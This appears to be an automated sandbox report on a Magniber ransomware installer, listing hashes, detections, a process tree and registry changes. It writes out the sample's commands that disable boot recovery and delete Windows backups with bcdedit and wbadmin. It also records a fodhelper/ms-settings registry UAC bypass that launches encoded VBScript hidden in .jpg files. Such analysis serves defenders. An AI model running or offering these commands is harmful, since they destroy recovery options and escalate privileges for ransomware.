Analysis
-
max time kernel
148s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system -
submitted
01-02-2025 20:34
Static task
static1
Behavioral task
behavioral1
Sample
2edafe324bbeec87dba04c61032a04815227dcf472f98411a2cd8d377651e862.msi
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
2edafe324bbeec87dba04c61032a04815227dcf472f98411a2cd8d377651e862.msi
Resource
win10v2004-20250129-en
General
-
Target
2edafe324bbeec87dba04c61032a04815227dcf472f98411a2cd8d377651e862.msi
-
Size
19.9MB
-
MD5
91d33bd53d76d436bb7a058a5f0622ff
-
SHA1
ec7404efa1deb47b9ffce7a23e2b08c8156c64f4
-
SHA256
2edafe324bbeec87dba04c61032a04815227dcf472f98411a2cd8d377651e862
-
SHA512
40d9a87fc2e545f81855b6ecf9e57a5430eef2c3c0d03789a5a6d350ee2a32e82f9f53020fb54b87942915841689e4e3825330023b7c6d409365a51b50f6e74d
-
SSDEEP
1536:DRGRtpZg7sNN/nR9k2AzwD0a0g0z0h0VrjJD/HRFDZyaD:cbpO7sNNrkTzxf4GVxrDZya
Malware Config
Signatures
-
Detect magniber ransomware 2 IoCs
resource yara_rule behavioral2/memory/2832-4-0x00000266EDD00000-0x00000266EDD09000-memory.dmp family_magniber behavioral2/memory/1188-20-0x00000279A7840000-0x00000279A7853000-memory.dmp family_magniber -
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Magniber family
-
Process spawned unexpected child process 12 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2756 4400 bcdedit.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4492 4400 bcdedit.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1364 4400 wbadmin.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3456 4400 wbadmin.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2768 4400 bcdedit.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1724 4400 bcdedit.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2864 4400 wbadmin.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4956 4400 wbadmin.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1232 4400 bcdedit.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2892 4400 wbadmin.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3644 4400 bcdedit.exe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1672 4400 wbadmin.exe 96 -
Modifies boot configuration data using bcdedit 1 TTPs 6 IoCs
pid Process 2756 bcdedit.exe 4492 bcdedit.exe 2768 bcdedit.exe 1724 bcdedit.exe 1232 bcdedit.exe 3644 bcdedit.exe -
Renames multiple (88) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 3456 wbadmin.exe 4956 wbadmin.exe 1672 wbadmin.exe -
pid Process 1364 wbadmin.exe 2864 wbadmin.exe 2892 wbadmin.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\V: msiexec.exe -
Drops file in Windows directory 6 IoCs
description ioc Process File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl wbadmin.exe File created C:\Windows\Installer\e57b9ca.msi msiexec.exe File opened for modification C:\Windows\Installer\e57b9ca.msi msiexec.exe -
Loads dropped DLL 1 IoCs
pid Process 1188 MsiExec.exe -
Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
pid Process 2412 msiexec.exe -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName vds.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000d2359f35a83f4e380000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000d2359f350000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900d2359f35000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1dd2359f35000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000d2359f3500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 backgroundTaskHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString backgroundTaskHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz backgroundTaskHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier backgroundTaskHost.exe -
Modifies registry class 27 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" backgroundTaskHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000_Classes\ms-settings Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000_Classes\ms-settings\CurVer Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000_Classes\ms-settings\CurVer svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/jwceoqdb.jpg" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000_Classes\Local Settings\MuiCache backgroundTaskHost.exe Key created \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000_Classes\ms-settings RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000_Classes\ms-settings\CurVer RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/phxdyri.jpg" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/cgqfqgdyhh.jpg" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000_Classes\ms-settings RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix backgroundTaskHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" backgroundTaskHost.exe Key created \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000_Classes\ms-settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000_Classes\ms-settings\CurVer RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/ksuwvjtphq.jpg" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute svchost.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1188 MsiExec.exe 1188 MsiExec.exe 2244 msiexec.exe 2244 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 2412 msiexec.exe Token: SeIncreaseQuotaPrivilege 2412 msiexec.exe Token: SeSecurityPrivilege 2244 msiexec.exe Token: SeCreateTokenPrivilege 2412 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2412 msiexec.exe Token: SeLockMemoryPrivilege 2412 msiexec.exe Token: SeIncreaseQuotaPrivilege 2412 msiexec.exe Token: SeMachineAccountPrivilege 2412 msiexec.exe Token: SeTcbPrivilege 2412 msiexec.exe Token: SeSecurityPrivilege 2412 msiexec.exe Token: SeTakeOwnershipPrivilege 2412 msiexec.exe Token: SeLoadDriverPrivilege 2412 msiexec.exe Token: SeSystemProfilePrivilege 2412 msiexec.exe Token: SeSystemtimePrivilege 2412 msiexec.exe Token: SeProfSingleProcessPrivilege 2412 msiexec.exe Token: SeIncBasePriorityPrivilege 2412 msiexec.exe Token: SeCreatePagefilePrivilege 2412 msiexec.exe Token: SeCreatePermanentPrivilege 2412 msiexec.exe Token: SeBackupPrivilege 2412 msiexec.exe Token: SeRestorePrivilege 2412 msiexec.exe Token: SeShutdownPrivilege 2412 msiexec.exe Token: SeDebugPrivilege 2412 msiexec.exe Token: SeAuditPrivilege 2412 msiexec.exe Token: SeSystemEnvironmentPrivilege 2412 msiexec.exe Token: SeChangeNotifyPrivilege 2412 msiexec.exe Token: SeRemoteShutdownPrivilege 2412 msiexec.exe Token: SeUndockPrivilege 2412 msiexec.exe Token: SeSyncAgentPrivilege 2412 msiexec.exe Token: SeEnableDelegationPrivilege 2412 msiexec.exe Token: SeManageVolumePrivilege 2412 msiexec.exe Token: SeImpersonatePrivilege 2412 msiexec.exe Token: SeCreateGlobalPrivilege 2412 msiexec.exe Token: SeCreateTokenPrivilege 2412 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2412 msiexec.exe Token: SeLockMemoryPrivilege 2412 msiexec.exe Token: SeIncreaseQuotaPrivilege 2412 msiexec.exe Token: SeMachineAccountPrivilege 2412 msiexec.exe Token: SeTcbPrivilege 2412 msiexec.exe Token: SeSecurityPrivilege 2412 msiexec.exe Token: SeTakeOwnershipPrivilege 2412 msiexec.exe Token: SeLoadDriverPrivilege 2412 msiexec.exe Token: SeSystemProfilePrivilege 2412 msiexec.exe Token: SeSystemtimePrivilege 2412 msiexec.exe Token: SeProfSingleProcessPrivilege 2412 msiexec.exe Token: SeIncBasePriorityPrivilege 2412 msiexec.exe Token: SeCreatePagefilePrivilege 2412 msiexec.exe Token: SeCreatePermanentPrivilege 2412 msiexec.exe Token: SeBackupPrivilege 2412 msiexec.exe Token: SeRestorePrivilege 2412 msiexec.exe Token: SeShutdownPrivilege 2412 msiexec.exe Token: SeDebugPrivilege 2412 msiexec.exe Token: SeAuditPrivilege 2412 msiexec.exe Token: SeSystemEnvironmentPrivilege 2412 msiexec.exe Token: SeChangeNotifyPrivilege 2412 msiexec.exe Token: SeRemoteShutdownPrivilege 2412 msiexec.exe Token: SeUndockPrivilege 2412 msiexec.exe Token: SeSyncAgentPrivilege 2412 msiexec.exe Token: SeEnableDelegationPrivilege 2412 msiexec.exe Token: SeManageVolumePrivilege 2412 msiexec.exe Token: SeImpersonatePrivilege 2412 msiexec.exe Token: SeCreateGlobalPrivilege 2412 msiexec.exe Token: SeCreateTokenPrivilege 2412 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2412 msiexec.exe Token: SeLockMemoryPrivilege 2412 msiexec.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2412 msiexec.exe 2412 msiexec.exe -
Suspicious use of UnmapMainImage 2 IoCs
pid Process 3384 Explorer.EXE 3880 StartMenuExperienceHost.exe -
Suspicious use of WriteProcessMemory 31 IoCs
description pid Process procid_target PID 2244 wrote to memory of 1188 2244 msiexec.exe 85 PID 2244 wrote to memory of 1188 2244 msiexec.exe 85 PID 1188 wrote to memory of 2832 1188 MsiExec.exe 49 PID 1188 wrote to memory of 2848 1188 MsiExec.exe 50 PID 1188 wrote to memory of 3036 1188 MsiExec.exe 52 PID 1188 wrote to memory of 3384 1188 MsiExec.exe 55 PID 1188 wrote to memory of 3564 1188 MsiExec.exe 57 PID 1188 wrote to memory of 3744 1188 MsiExec.exe 58 PID 1188 wrote to memory of 3880 1188 MsiExec.exe 59 PID 1188 wrote to memory of 3956 1188 MsiExec.exe 60 PID 1188 wrote to memory of 4044 1188 MsiExec.exe 61 PID 1188 wrote to memory of 3828 1188 MsiExec.exe 62 PID 1188 wrote to memory of 4412 1188 MsiExec.exe 74 PID 1188 wrote to memory of 4924 1188 MsiExec.exe 76 PID 1188 wrote to memory of 1968 1188 MsiExec.exe 80 PID 1188 wrote to memory of 1988 1188 MsiExec.exe 81 PID 1188 wrote to memory of 2412 1188 MsiExec.exe 82 PID 2244 wrote to memory of 3668 2244 msiexec.exe 93 PID 2244 wrote to memory of 3668 2244 msiexec.exe 93 PID 1448 wrote to memory of 4632 1448 cmd.exe 100 PID 1448 wrote to memory of 4632 1448 cmd.exe 100 PID 4632 wrote to memory of 768 4632 fodhelper.exe 101 PID 4632 wrote to memory of 768 4632 fodhelper.exe 101 PID 1140 wrote to memory of 4816 1140 cmd.exe 116 PID 1140 wrote to memory of 4816 1140 cmd.exe 116 PID 4816 wrote to memory of 4700 4816 fodhelper.exe 117 PID 4816 wrote to memory of 4700 4816 fodhelper.exe 117 PID 4764 wrote to memory of 4368 4764 cmd.exe 128 PID 4764 wrote to memory of 4368 4764 cmd.exe 128 PID 4368 wrote to memory of 232 4368 fodhelper.exe 129 PID 4368 wrote to memory of 232 4368 fodhelper.exe 129 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵
- Modifies registry class
PID:2832
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2848
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵PID:3036
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:3384 -
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\2edafe324bbeec87dba04c61032a04815227dcf472f98411a2cd8d377651e862.msi2⤵
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2412
-
-
C:\Windows\System32\cmd.exe/c fodhelper.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1140 -
C:\Windows\System32\fodhelper.exefodhelper.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4816 -
C:\Windows\system32\wscript.exe"wscript.exe" /B /E:VBScript.Encode ../../Users/Public/cgqfqgdyhh.jpg4⤵PID:4700
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
- Modifies registry class
PID:3564 -
C:\Windows\System32\cmd.exe/c fodhelper.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4764 -
C:\Windows\System32\fodhelper.exefodhelper.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4368 -
C:\Windows\system32\wscript.exe"wscript.exe" /B /E:VBScript.Encode ../../Users/Public/phxdyri.jpg4⤵PID:232
-
-
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3744
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of UnmapMainImage
PID:3880
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3956
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:4044
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:3828 -
C:\Windows\System32\cmd.exe/c fodhelper.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1448 -
C:\Windows\System32\fodhelper.exefodhelper.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Windows\system32\wscript.exe"wscript.exe" /B /E:VBScript.Encode ../../Users/Public/ksuwvjtphq.jpg4⤵PID:768
-
-
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca1⤵PID:4412
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:4924
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppX3bn25b6f886wmg6twh46972vprk9tnbf.mca1⤵PID:1968
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
- Checks processor information in registry
- Modifies registry class
PID:1988
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding BEF65C79C01B38EC7042586145F443D3 C2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1188
-
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:3668
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:4536
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:2756
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:4492
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet1⤵
- Process spawned unexpected child process
- Deletes backup catalog
PID:1364
-
C:\Windows\system32\wbadmin.exewbadmin delete systemstatebackup -quiet1⤵
- Process spawned unexpected child process
- Deletes System State backups
PID:3456
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵PID:3452
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:3916
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:2424
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:2768
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:1724
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet1⤵
- Process spawned unexpected child process
- Deletes backup catalog
PID:2864
-
C:\Windows\system32\wbadmin.exewbadmin delete systemstatebackup -quiet1⤵
- Process spawned unexpected child process
- Deletes System State backups
- Drops file in Windows directory
PID:4956
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:1232
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:3644
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet1⤵
- Process spawned unexpected child process
- Deletes backup catalog
PID:2892
-
C:\Windows\system32\wbadmin.exewbadmin delete systemstatebackup -quiet1⤵
- Process spawned unexpected child process
- Deletes System State backups
PID:1672
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310091\1738442112
Filesize2KB
MD5c3e76ec20a27ddfa069c4f1a2d996f01
SHA197bc0cccd58995b3d8ec1909d01ef8d46b8b0340
SHA256a111a793ff44a788f80bc0c381627caa5d2415270d619380869e0b84bcefda96
SHA512ff5611f63a097930061979490e800ef900571ec326b2a81c656b993d16bca7478ef32f9b02cf01f4127e613d2ec99c6e3477b48f8ab57261d9afab1540a4e5a8
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\1738442112
Filesize4KB
MD5cbe3eec3171d590af2b46ac3606184ee
SHA1358501b10903a81b3b8b283621edc954b15abe45
SHA256a6e92df96d32b637544296ff2851e5c74c4866883ca27e6e733eb90e5a29ff00
SHA5124e6ed3eea16521ace0809e29416466dad5b414bc10f38c7a76379adca6708a878340dbbd34b456ccfb1cd36ad40928903f59277257358f70a72a9339a4efc224
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133829157265861524.txt
Filesize74KB
MD573c2bdb07ed7a7bbc6e0cdad7ae7c140
SHA1a86796b5d1b4637dfc32e4ad0fe163255cb78d3c
SHA2563ac0db9519110b04a96d1f7ce523a573db7bc631cf115c75372443b9a32f330a
SHA512b8eb81701c9bd83f9363288673364cc9ae37891b2b60cc7ed54087cae77820358116509e8f7973def27729dc27640dff4f5e05ec53d319bccb749c53d045fe6f
-
Filesize
120KB
MD59fda78dab4834f25d5dbb575ce8d3559
